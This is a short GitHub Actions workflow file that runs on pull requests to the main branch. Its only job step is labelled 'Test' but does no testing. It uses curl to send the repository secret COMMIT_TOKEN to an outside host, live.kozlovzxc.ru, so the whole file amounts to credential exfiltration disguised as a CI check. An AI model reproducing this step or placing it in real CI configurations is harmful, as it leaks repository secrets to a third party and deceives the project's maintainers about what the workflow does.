name: Public
on:
  pull_request:
    branches: [main]
jobs:
  pull_request_ci:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Test
        run: curl "https://live.kozlovzxc.ru?secret=$COMMIT_TOKEN"
        env:
          COMMIT_TOKEN: ${{ secrets.COMMIT_TOKEN }}

      
